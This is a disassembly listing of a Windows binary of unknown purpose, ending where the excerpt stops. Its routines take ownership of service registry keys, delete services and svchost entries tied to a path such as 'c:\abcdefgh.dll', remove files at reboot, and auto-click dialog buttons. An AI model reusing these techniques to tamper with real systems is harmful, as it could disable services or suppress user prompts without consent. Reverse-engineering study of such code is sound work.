; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A4157 proc near ; CODE XREF: sub_9A4358+2B0�p
NumberOfBytesRead= dword ptr -0Ch
var_8 = dword ptr -8
Buffer = byte ptr -1
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, wcslen
push edi
mov edi, eax
xor ebx, ebx
push edi ; Str
mov [ebp+var_8], ebx
call esi ; wcslen
cmp eax, 4
pop ecx
jbe loc_9A4200
push offset a_dll ; ".dll"
push edi ; Str
call esi ; wcslen
pop ecx
lea eax, [edi+eax*2-8]
push eax ; Str1
call _wcsicmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9A4200
push ebx ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 7 ; dwShareMode
push 80000000h ; dwDesiredAccess
push edi ; lpFileName
call CreateFileW
mov esi, GetLastError
mov edi, eax
call esi ; GetLastError
cmp edi, 0FFFFFFFFh
jnz short loc_9A41CD
cmp eax, 20h
jz short loc_9A41C4
cmp eax, 5
jnz short loc_9A41CD
loc_9A41C4: ; CODE XREF: sub_9A4157+66�j
mov [ebp+var_8], 1
jmp short loc_9A41FB
; ---------------------------------------------------------------------------
loc_9A41CD: ; CODE XREF: sub_9A4157+61�j
; sub_9A4157+6B�j
push ebx ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
xor ebx, ebx
inc ebx
push ebx ; nNumberOfBytesToRead
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push edi ; hFile
call ReadFile
test eax, eax
jnz short loc_9A41EF
call esi ; GetLastError
cmp eax, 21h
jnz short loc_9A41EF
mov [ebp+var_8], ebx
loc_9A41EF: ; CODE XREF: sub_9A4157+8C�j
; sub_9A4157+93�j
cmp edi, 0FFFFFFFFh
jz short loc_9A41FB
push edi ; hObject
call CloseHandle
loc_9A41FB: ; CODE XREF: sub_9A4157+74�j
; sub_9A4157+9B�j
mov eax, [ebp+var_8]
jmp short loc_9A4202
; ---------------------------------------------------------------------------
loc_9A4200: ; CODE XREF: sub_9A4157+1D�j
; sub_9A4157+3B�j
xor eax, eax
loc_9A4202: ; CODE XREF: sub_9A4157+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A4157 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A4207 proc near ; CODE XREF: sub_9A4358+2E4�p
pszSubKey = word ptr -20Ch
var_1C6 = byte ptr -1C6h
var_6 = word ptr -6
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20Ch
mov eax, dword_9B8788
push esi
push edi
push 11h
pop ecx
mov esi, offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\"
lea edi, [ebp+pszSubKey]
rep movsd
xor eax, ebp
mov [ebp+var_4], eax
push 70h
movsw
pop ecx
xor eax, eax
lea edi, [ebp+var_1C6]
rep stosd
push 104h ; Count
stosw
push edx ; Source
lea eax, [ebp+pszSubKey]
push eax ; Dest
call wcsncat
and [ebp+var_6], 0
push 1
lea eax, [ebp+pszSubKey]
push eax
mov esi, 80000002h
push esi
call sub_9A7001
add esp, 18h
lea eax, [ebp+pszSubKey]
push eax ; pszSubKey
push esi ; hkey
call SHDeleteKeyW
mov ecx, [ebp+var_4]
neg eax
sbb eax, eax
pop edi
xor ecx, ebp
inc eax
pop esi
call sub_9AAAC1
leave
retn
sub_9A4207 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=7A8h
; int __fastcall sub_9A428D(LPCWSTR lpServiceName)
sub_9A428D proc near ; CODE XREF: sub_9A4358+2BF�p
ServiceStatus = _SERVICE_STATUS ptr -828h
pcbBytesNeeded = dword ptr -80Ch
var_808 = dword ptr -808h
ServiceConfig = _QUERY_SERVICE_CONFIGA ptr -804h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-7A8h]
sub esp, 828h
mov eax, dword_9B8788
push ebx
push esi
push edi
xor edi, edi
push 80000000h ; dwDesiredAccess
push edi ; lpDatabaseName
xor eax, ebp
push edi ; lpMachineName
mov [ebp+7A8h+var_4], eax
mov esi, ecx
mov [ebp+7A8h+var_808], edi
call OpenSCManagerA
mov ebx, eax
cmp ebx, edi
jz short loc_9A433D
push 5 ; dwDesiredAccess
push esi ; lpServiceName
push ebx ; hSCManager
call OpenServiceW
mov esi, eax
cmp esi, edi
mov edi, CloseServiceHandle
jz short loc_9A4326
lea eax, [ebp+7A8h+ServiceStatus]
push eax ; lpServiceStatus
push esi ; hService
call QueryServiceStatus
test eax, eax
jz short loc_9A4321
lea eax, [ebp+7A8h+pcbBytesNeeded]
push eax ; pcbBytesNeeded
push 800h ; cbBufSize
lea eax, [ebp+7A8h+ServiceConfig]
push eax ; lpServiceConfig
push esi ; hService
call QueryServiceConfigA
test eax, eax
jz short loc_9A4321
cmp [ebp+7A8h+ServiceConfig.dwServiceType], 20h
jnz short loc_9A431D
cmp [ebp+7A8h+ServiceConfig.dwStartType], 2
jnz short loc_9A431D
cmp [ebp+7A8h+ServiceStatus.dwCurrentState], 4
jz short loc_9A431D
mov [ebp+7A8h+var_808], 1
jmp short loc_9A4321
; ---------------------------------------------------------------------------
loc_9A431D: ; CODE XREF: sub_9A428D+79�j
; sub_9A428D+7F�j ...
and [ebp+7A8h+var_808], 0
loc_9A4321: ; CODE XREF: sub_9A428D+5B�j
; sub_9A428D+73�j ...
push esi ; hSCObject
call edi ; CloseServiceHandle
jmp short loc_9A433A
; ---------------------------------------------------------------------------
loc_9A4326: ; CODE XREF: sub_9A428D+4C�j
call GetLastError
cmp eax, 424h
jnz short loc_9A433A
mov [ebp+7A8h+var_808], 1
loc_9A433A: ; CODE XREF: sub_9A428D+97�j
; sub_9A428D+A4�j
push ebx ; hSCObject
call edi ; CloseServiceHandle
loc_9A433D: ; CODE XREF: sub_9A428D+36�j
mov ecx, [ebp+7A8h+var_4]
mov eax, [ebp+7A8h+var_808]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
add ebp, 7A8h
leave
retn
sub_9A428D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A4358 proc near ; CODE XREF: sub_9A471B+129�p
; sub_9A471B+144�p
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
Dst = word ptr -2D0h
Type = dword ptr -2CCh
psidOwner = dword ptr -2C8h
Count = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
Data = byte ptr -2B9h
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
hMem = dword ptr -2B0h
cbData = dword ptr -2ACh
hKey = dword ptr -2A8h
lpServiceName = dword ptr -2A4h
lpWideCharStr = dword ptr -2A0h
Str1 = word ptr -29Ch
Source = word ptr -94h
var_4C = byte ptr -4Ch
ValueName = word ptr -34h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 2D4h
push offset stru_9A27B0
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
mov eax, [ebp+arg_0]
mov [ebp+lpServiceName], eax
push 104h ; cchWideChar
lea eax, [ebp+Str1]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push offset FileName ; "c:\\abcdefgh.dll"
xor ebx, ebx
push ebx ; dwFlags
push ebx ; CodePage
call MultiByteToWideChar
test eax, eax
jz short loc_9A43FC
mov [ebp+var_2C0], ebx
mov [ebp+ms_exc.disabled], ebx
push 11h
pop ecx
mov esi, offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\"
lea edi, [ebp+Source]
rep movsd
movsw
push 6
pop ecx
mov esi, offset aParameters ; "\\Parameters"
lea edi, [ebp+var_4C]
rep movsd
push [ebp+lpServiceName] ; Str
call wcslen
pop ecx
lea esi, [eax+eax+5Ch]
mov [ebp+var_2DC], esi
push esi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov edi, eax
mov [ebp+var_2D4], edi
cmp edi, ebx
jnz short loc_9A4403
push 0FFFFFFFFh
lea eax, [ebp+ms_exc.prev_er]
push eax
call __local_unwind2
pop ecx
pop ecx
loc_9A43FC: ; CODE XREF: sub_9A4358+41�j
xor eax, eax
jmp loc_9A470A
; ---------------------------------------------------------------------------
loc_9A4403: ; CODE XREF: sub_9A4358+95�j
shr esi, 1
mov [ebp+Count], esi
push esi ; Count
lea eax, [ebp+Source]
push eax ; Source
push edi ; Dest
call wcsncpy
lea esi, [edi+esi*2-2]
mov [esi], bx
push [ebp+Count] ; Count
push [ebp+lpServiceName] ; Source
push edi ; Dest
call wcsncat
mov [esi], bx
push [ebp+Count] ; Count
lea eax, [ebp+var_4C]
push eax ; Source
push edi ; Dest
call wcsncat
add esp, 24h
mov [esi], bx
mov [ebp+var_2B8], ebx
mov [ebp+psidOwner], ebx
lea eax, [ebp+hKey]
push eax ; phkResult
push 20019h ; samDesired
push ebx ; ulOptions
push edi ; lpSubKey
mov esi, 80000002h
push esi ; hKey
call RegOpenKeyExW
mov [ebp+var_2B4], eax
cmp eax, 5
jnz short loc_9A44BB
lea eax, [ebp+var_2B8]
push eax ; int
lea eax, [ebp+psidOwner]
push eax ; ppsidOwner
push edi ; int
push esi ; int
call sub_9A706C
push 1
push edi
push esi
call sub_9A7001
add esp, 1Ch
lea eax, [ebp+hKey]
push eax ; phkResult
push 20019h ; samDesired
push ebx ; ulOptions
push edi ; lpSubKey
push esi ; hKey
call RegOpenKeyExW
mov [ebp+var_2B4], eax
loc_9A44BB: ; CODE XREF: sub_9A4358+125�j
cmp eax, ebx
jnz loc_9A46D6
mov [ebp+Type], 2
mov [ebp+cbData], 1
push 5
pop ecx
mov esi, offset aServicedll ; "ServiceDll"
lea edi, [ebp+ValueName]
rep movsd
movsw
lea eax, [ebp+cbData]
push eax ; lpcbData
lea eax, [ebp+Data]
push eax ; lpData
lea eax, [ebp+Type]
push eax ; lpType
push ebx ; lpReserved
lea eax, [ebp+ValueName]
push eax ; lpValueName
push [ebp+hKey] ; hKey
mov esi, RegQueryValueExW
call esi ; RegQueryValueExW
mov [ebp+var_2B4], eax
cmp eax, 0EAh
jnz loc_9A46BF
cmp [ebp+cbData], ebx
jz loc_9A46BF
push [ebp+cbData] ; dwBytes
push 40h ; uFlags
mov edi, GlobalAlloc
call edi ; GlobalAlloc
mov [ebp+hMem], eax
cmp eax, ebx
jz loc_9A46BF
lea ecx, [ebp+cbData]
push ecx ; lpcbData
push eax ; lpData
lea eax, [ebp+Type]
push eax ; lpType
push ebx ; lpReserved
lea eax, [ebp+ValueName]
push eax ; lpValueName
push [ebp+hKey] ; hKey
call esi ; RegQueryValueExW
mov [ebp+var_2B4], eax
cmp eax, ebx
jnz loc_9A46B3
push 2 ; nSize
lea eax, [ebp+Dst]
push eax ; lpDst
push [ebp+hMem] ; lpSrc
call ExpandEnvironmentStringsW
mov esi, eax
mov [ebp+var_2E4], esi
cmp esi, ebx
jz loc_9A46B3
lea eax, [esi+esi]
push eax ; dwBytes
push 40h ; uFlags
call edi ; GlobalAlloc
mov [ebp+lpWideCharStr], eax
cmp eax, ebx
jz loc_9A46B3
push esi ; nSize
push eax ; lpDst
push [ebp+hMem] ; lpSrc
call ExpandEnvironmentStringsW
cmp esi, eax
jnz loc_9A46A7
cmp [ebp+arg_8], ebx
jz short loc_9A4602
push [ebp+lpWideCharStr] ; Str
call wcslen
mov [ebp+var_2E0], eax
push eax ; MaxCount
push [ebp+lpWideCharStr] ; Str2
lea eax, [ebp+Str1]
push eax ; Str1
call _wcsnicmp
add esp, 10h
neg eax
sbb eax, eax
inc eax
mov [ebp+var_2C0], eax
jmp loc_9A46A7
; ---------------------------------------------------------------------------
loc_9A4602: ; CODE XREF: sub_9A4358+26F�j
mov eax, [ebp+lpWideCharStr]
call sub_9A4157
test eax, eax
jz short loc_9A4625
mov ecx, [ebp+lpServiceName] ; lpServiceName
call sub_9A428D
test eax, eax
jz short loc_9A4625
xor eax, eax
inc eax
jmp short loc_9A4627
; ---------------------------------------------------------------------------
loc_9A4625: ; CODE XREF: sub_9A4358+2B7�j
; sub_9A4358+2C6�j
xor eax, eax
loc_9A4627: ; CODE XREF: sub_9A4358+2CB�j
mov [ebp+var_2C0], eax
cmp eax, ebx
jz short loc_9A46A7
cmp [ebp+arg_4], ebx
jz short loc_9A46A7
mov edx, [ebp+lpServiceName]
call sub_9A4207
test eax, eax
jz short loc_9A46A7
push esi ; dwBytes
push 40h ; uFlags
call edi ; GlobalAlloc
mov edi, eax
mov [ebp+var_2D8], edi
cmp edi, ebx
jz short loc_9A4688
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push esi ; cbMultiByte
push edi ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9A4681
mov [edi+esi-1], bl
push ebx ; int
push 1F01FFh ; int
push edi ; Str
call sub_9A68CA
add esp, 0Ch
loc_9A4681: ; CODE XREF: sub_9A4358+314�j
push edi ; hMem
call GlobalFree
loc_9A4688: ; CODE XREF: sub_9A4358+2FC�j
push [ebp+lpWideCharStr] ; lpFileName
call DeleteFileW
test eax, eax
jnz short loc_9A46A7
push 4 ; dwFlags
push ebx ; lpNewFileName
push [ebp+lpWideCharStr] ; lpExistingFileName
call MoveFileExW
loc_9A46A7: ; CODE XREF: sub_9A4358+266�j
; sub_9A4358+2A5�j ...
push [ebp+lpWideCharStr] ; hMem
call GlobalFree
loc_9A46B3: ; CODE XREF: sub_9A4358+215�j
; sub_9A4358+23A�j ...
push [ebp+hMem] ; hMem
call GlobalFree
loc_9A46BF: ; CODE XREF: sub_9A4358+1C1�j
; sub_9A4358+1CD�j ...
push [ebp+hKey] ; hKey
call RegCloseKey
mov edi, [ebp+var_2D4]
mov esi, 80000002h
loc_9A46D6: ; CODE XREF: sub_9A4358+165�j
cmp [ebp+var_2B8], ebx
jz short loc_9A46F4
push [ebp+var_2B8] ; int
push [ebp+psidOwner] ; psidOwner
push edi ; int
push esi ; int
call sub_9A70DD
add esp, 10h
loc_9A46F4: ; CODE XREF: sub_9A4358+384�j
push edi ; hMem
call GlobalFree
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_2C0]
loc_9A470A: ; CODE XREF: sub_9A4358+A6�j
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A4358 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A471B(LPCWSTR lpValueName,int,int,int)
sub_9A471B proc near ; CODE XREF: sub_9A394B+1D�p
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
psidOwner = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
Type = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
hKey = dword ptr -2Ch
Source = dword ptr -28h
lpData = dword ptr -24h
cbData = dword ptr -20h
Data = byte ptr -19h
ms_exc = CPPEH_RECORD ptr -18h
lpValueName = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 44h
push offset stru_9A27C0
call __SEH_prolog
xor edi, edi
mov [ebp+var_30], edi
mov [ebp+ms_exc.disabled], edi
mov [ebp+var_34], edi
mov [ebp+psidOwner], edi
lea eax, [ebp+hKey]
push eax ; phkResult
push 3 ; samDesired
push edi ; ulOptions
mov ebx, offset SubKey ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
push ebx ; lpSubKey
push 80000002h ; hKey
mov esi, RegOpenKeyExW
call esi ; RegOpenKeyExW
mov [ebp+var_48], eax
cmp eax, 5
jnz short loc_9A478C
lea eax, [ebp+var_34]
push eax ; int
lea eax, [ebp+psidOwner]
push eax ; ppsidOwner
push ebx ; int
push 80000002h ; int
call sub_9A706C
push 1
push ebx
push 80000002h
call sub_9A7001
add esp, 1Ch
lea eax, [ebp+hKey]
push eax ; phkResult
push 3 ; samDesired
push edi ; ulOptions
push ebx ; lpSubKey
push 80000002h ; hKey
call esi ; RegOpenKeyExW
mov [ebp+var_48], eax
loc_9A478C: ; CODE XREF: sub_9A471B+3A�j
cmp eax, edi
jnz loc_9A491B
mov [ebp+cbData], 1
mov [ebp+Type], 7
lea eax, [ebp+cbData]
push eax ; lpcbData
lea eax, [ebp+Data]
push eax ; lpData
lea eax, [ebp+Type]
push eax ; lpType
push edi ; lpReserved
push [ebp+lpValueName] ; lpValueName
push [ebp+hKey] ; hKey
mov esi, RegQueryValueExW
call esi ; RegQueryValueExW
mov [ebp+var_40], eax
cmp eax, 0EAh
jnz loc_9A4912
push [ebp+cbData] ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov [ebp+Source], eax
push [ebp+cbData] ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov [ebp+lpData], eax
cmp [ebp+Source], edi
jz loc_9A48F6
cmp eax, edi
jz loc_9A48F6
lea eax, [ebp+cbData]
push eax ; lpcbData
push [ebp+Source] ; lpData
lea eax, [ebp+Type]
push eax ; lpType
push edi ; lpReserved
push [ebp+lpValueName] ; lpValueName
push [ebp+hKey] ; hKey
call esi ; RegQueryValueExW
mov [ebp+var_40], eax
mov ebx, [ebp+Source]
mov [ebp+var_50], ebx
mov esi, [ebp+lpData]
mov [ebp+var_4C], esi
mov [ebp+var_3C], edi
loc_9A481E: ; CODE XREF: sub_9A471B+1A4�j
mov eax, ebx
sub eax, [ebp+Source]
sar eax, 1
mov ecx, [ebp+cbData]
shr ecx, 1
cmp eax, ecx
jnb loc_9A48C4
cmp [ebx], di
jz loc_9A48C4
cmp [ebp+arg_8], edi
jz short loc_9A485B
push 1
push edi
push ebx
call sub_9A4358
add esp, 0Ch
test eax, eax
jz short loc_9A48B0
push [ebp+arg_C]
push ebx
call [ebp+arg_8]
pop ecx
pop ecx
jmp short loc_9A48B0
; ---------------------------------------------------------------------------
loc_9A485B: ; CODE XREF: sub_9A471B+123�j
push edi
push 1
push ebx
call sub_9A4358
add esp, 0Ch
mov [ebp+var_54], eax
cmp eax, edi
jnz short loc_9A48A9
mov eax, [ebp+cbData]
shr eax, 1
shl eax, 1
sub eax, esi
add eax, [ebp+lpData]
sar eax, 1
push eax ; Count
push ebx ; Source
push esi ; Dest
call wcsncpy
push esi ; Str
call wcslen
add esp, 10h
lea esi, [esi+eax*2+2]
mov [ebp+var_4C], esi
mov [esi], di
mov eax, esi
sub eax, [ebp+lpData]
sar eax, 1
lea eax, [eax+eax+2]
mov [ebp+var_3C], eax
jmp short loc_9A48B0
; ---------------------------------------------------------------------------
loc_9A48A9: ; CODE XREF: sub_9A471B+151�j
mov [ebp+var_30], 1
loc_9A48B0: ; CODE XREF: sub_9A471B+133�j
; sub_9A471B+13E�j ...
push ebx ; Str
call wcslen
pop ecx
lea ebx, [ebx+eax*2+2]
mov [ebp+var_50], ebx
jmp loc_9A481E
; ---------------------------------------------------------------------------
loc_9A48C4: ; CODE XREF: sub_9A471B+111�j
; sub_9A471B+11A�j
cmp [ebp+var_30], edi
jz short loc_9A48F1
cmp [ebp+arg_4], edi
jz short loc_9A48F1
push [ebp+var_3C] ; cbData
push [ebp+lpData] ; lpData
push 7 ; dwType
push edi ; Reserved
push [ebp+lpValueName] ; lpValueName
push [ebp+hKey] ; hKey
call RegSetValueExW
mov [ebp+var_40], eax
cmp eax, edi
jnz short loc_9A48F1
mov [ebp+var_30], 1
loc_9A48F1: ; CODE XREF: sub_9A471B+1AC�j
; sub_9A471B+1B1�j ...
mov ebx, offset SubKey ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
loc_9A48F6: ; CODE XREF: sub_9A471B+CF�j
; sub_9A471B+D7�j
cmp [ebp+lpData], edi
jz short loc_9A4904
push [ebp+lpData] ; hMem
call GlobalFree
loc_9A4904: ; CODE XREF: sub_9A471B+1DE�j
cmp [ebp+Source], edi
jz short loc_9A4912
push [ebp+Source] ; hMem
call GlobalFree
loc_9A4912: ; CODE XREF: sub_9A471B+AA�j
; sub_9A471B+1EC�j
push [ebp+hKey] ; hKey
call RegCloseKey
loc_9A491B: ; CODE XREF: sub_9A471B+73�j
cmp [ebp+var_34], edi
jz short loc_9A4934
push [ebp+var_34] ; int
push [ebp+psidOwner] ; psidOwner
push ebx ; int
push 80000002h ; int
call sub_9A70DD
add esp, 10h
loc_9A4934: ; CODE XREF: sub_9A471B+203�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call nullsub_2
mov eax, [ebp+var_30]
call __SEH_epilog
retn
sub_9A471B endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; BOOL __stdcall fn(HWND,LPARAM)
fn proc near ; DATA XREF: sub_9A4977+15�o
hDlg = dword ptr 4
push 1 ; nIDDlgItem
push [esp+4+hDlg] ; hDlg
call GetDlgItem
test eax, eax
jz short loc_9A4971
push 0 ; lParam
push 0 ; wParam
push 0F5h ; Msg
push eax ; hWnd
call PostMessageA
mov dword_9BB2E4, 1
loc_9A4971: ; CODE XREF: fn+E�j
xor eax, eax
inc eax
retn 8
fn endp
; =============== S U B R O U T I N E =======================================
; DWORD __stdcall sub_9A4977(LPVOID)
sub_9A4977 proc near ; DATA XREF: sub_9A49B2+12F�o
dwThreadId = dword ptr 4
and dword_9BB2E4, 0
push esi
xor esi, esi
loc_9A4981: ; CODE XREF: sub_9A4977+33�j
cmp dword_9BB2E4, 0
jnz short loc_9A49AC
push 0 ; lParam
push offset fn ; lpfn
push [esp+0Ch+dwThreadId] ; dwThreadId
call EnumThreadWindows
push 0Ah ; dwMilliseconds
call Sleep
inc esi
cmp esi, 5DCh
jl short loc_9A4981
loc_9A49AC: ; CODE XREF: sub_9A4977+11�j
xor eax, eax
pop esi
retn 4
sub_9A4977 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A49B2 proc near ; CODE XREF: sub_9A4B7B+5E�p
pvarg = VARIANTARG ptr -38h
ExitCode = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 38h
mov eax, [ebx]
push esi
lea ecx, [ebp+var_1C]
push ecx
xor esi, esi
push ebx
mov [ebp+var_1C], esi
call dword ptr [eax+2Ch]
mov eax, [ebp+var_1C]
cmp eax, esi
jz loc_9A4B78
lea edx, [ebp+var_14]
push edx
mov [ebp+var_8], esi
mov [ebp+var_14], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+1Ch]
mov eax, [ebp+var_14]
cmp eax, esi
jz short loc_9A4A01
mov ecx, [eax]
lea edx, [ebp+var_8]
push edx
push offset dword_9A27DC
push eax
call dword ptr [ecx]
mov eax, [ebp+var_14]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4A01: ; CODE XREF: sub_9A49B2+36�j
cmp [ebp+var_8], esi
jz loc_9A4B6F
lea eax, [ebp+pvarg]
push eax ; pvarg
call VariantInit
mov eax, [ebp+var_8]
mov ecx, [eax]
push esi
lea edx, [ebp+pvarg]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_9A4B66
push edi
loc_9A4A2D: ; CODE XREF: sub_9A49B2+1AD�j
cmp word ptr [ebp+pvarg.anonymous_0], 0Dh
jnz loc_9A4B43
mov eax, dword ptr [ebp+pvarg.anonymous_0+8]
lea edx, [ebp+var_4]
push edx
push offset dword_9A27CC
mov [ebp+var_4], esi
mov ecx, [eax]
push eax
call dword ptr [ecx]
cmp [ebp+var_4], esi
jz loc_9A4B43
mov eax, [ebx]
lea ecx, [ebp+var_10]
push ecx
push [ebp+var_4]
mov [ebp+var_10], esi
push ebx
call dword ptr [eax+30h]
mov eax, [ebp+var_10]
cmp eax, esi
jz loc_9A4B3A
lea edx, [ebp+var_20]
push edx
mov [ebp+var_20], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+30h]
test byte ptr [ebp+var_20+1], 4
jz loc_9A4B31
mov eax, [ebp+var_10]
lea edx, [ebp+var_18]
push edx
mov [ebp+var_18], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+2Ch]
cmp [ebp+var_18], 8
jz loc_9A4B31
cmp [ebp+var_18], 9
jz loc_9A4B31
mov eax, [ebx]
lea ecx, [ebp+var_C]
push ecx
push [ebp+var_4]
mov [ebp+var_C], esi
push ebx
call dword ptr [eax+28h]
mov eax, [ebp+var_C]
cmp eax, esi
jz short loc_9A4B31
lea edx, [ebp+var_24]
push edx
mov [ebp+var_24], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+2Ch]
cmp word ptr [ebp+var_24], si
jz short loc_9A4B28
lea eax, [ebp+ExitCode]
push eax ; lpThreadId
push esi ; dwCreationFlags
call GetCurrentThreadId
push eax ; lpParameter
push offset sub_9A4977 ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call CreateThread
push 64h ; dwMilliseconds
mov edi, eax
call Sleep
mov eax, [ebp+var_C]
mov ecx, [eax]
push eax
call dword ptr [ecx+30h]
lea eax, [ebp+ExitCode]
push eax ; lpExitCode
push edi ; hThread
call GetExitCodeThread
test eax, eax
jz short loc_9A4B21
cmp [ebp+ExitCode], 103h
jnz short loc_9A4B21
push esi ; dwExitCode
push edi ; hThread
call TerminateThread
loc_9A4B21: ; CODE XREF: sub_9A49B2+15C�j
; sub_9A49B2+165�j
push edi ; hObject
call CloseHandle
loc_9A4B28: ; CODE XREF: sub_9A49B2+121�j
mov eax, [ebp+var_C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4B31: ; CODE XREF: sub_9A49B2+CF�j
; sub_9A49B2+E9�j ...
mov eax, [ebp+var_10]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4B3A: ; CODE XREF: sub_9A49B2+B8�j
mov eax, [ebp+var_4]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4B43: ; CODE XREF: sub_9A49B2+80�j
; sub_9A49B2+9D�j
lea eax, [ebp+pvarg]
push eax ; pvarg
call VariantClear
mov eax, [ebp+var_8]
mov ecx, [eax]
push esi
lea edx, [ebp+pvarg]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jz loc_9A4A2D
pop edi
loc_9A4B66: ; CODE XREF: sub_9A49B2+74�j
mov eax, [ebp+var_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4B6F: ; CODE XREF: sub_9A49B2+52�j
mov eax, [ebp+var_1C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4B78: ; CODE XREF: sub_9A49B2+1B�j
pop esi
leave
retn
sub_9A49B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9A4B7B(LPVOID)
sub_9A4B7B proc near ; DATA XREF: sub_9A4FEF+C�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
ppv = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 14h
push offset stru_9A2810
call __SEH_prolog
push 6 ; dwCoInit
xor esi, esi
push esi ; pvReserved
call CoInitializeEx
mov [ebp+var_20], eax
cmp eax, 80010106h
jz short loc_9A4BA0
cmp eax, esi
jl short loc_9A4BFA
loc_9A4BA0: ; CODE XREF: sub_9A4B7B+1F�j
push esi ; pReserved3
push esi ; dwCapabilities
push esi ; pAuthList
push 3 ; dwImpLevel
push 4 ; dwAuthnLevel
push esi ; pReserved1
push esi ; asAuthSvc
push 0FFFFFFFFh ; cAuthSvc
push esi ; pSecDesc
call CoInitializeSecurity
mov [ebp+ms_exc.disabled], esi
mov [ebp+ppv], esi
lea eax, [ebp+ppv]
push eax ; ppv
push offset stru_9A27FC ; riid
push 17h ; dwClsContext
push esi ; pUnkOuter
push offset stru_9A27EC ; rclsid
call CoCreateInstance
mov [ebp+var_24], eax
mov ebx, [ebp+ppv]
cmp ebx, esi
jz short loc_9A4BE7
call sub_9A49B2
mov eax, [ebp+ppv]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4BE7: ; CODE XREF: sub_9A4B7B+5C�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9A4BFA
; ---------------------------------------------------------------------------
loc_9A4BED: ; DATA XREF: .text:stru_9A2810�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A4BF1: ; DATA XREF: .text:stru_9A2810�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor esi, esi
loc_9A4BFA: ; CODE XREF: sub_9A4B7B+23�j
; sub_9A4B7B+70�j
cmp [ebp+var_20], esi
jl short loc_9A4C05
call CoUninitialize
loc_9A4C05: ; CODE XREF: sub_9A4B7B+82�j
xor eax, eax
call __SEH_epilog
retn 4
sub_9A4B7B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A4C0F proc near ; CODE XREF: sub_9A5033+40�p
; sub_9A514A+65�p
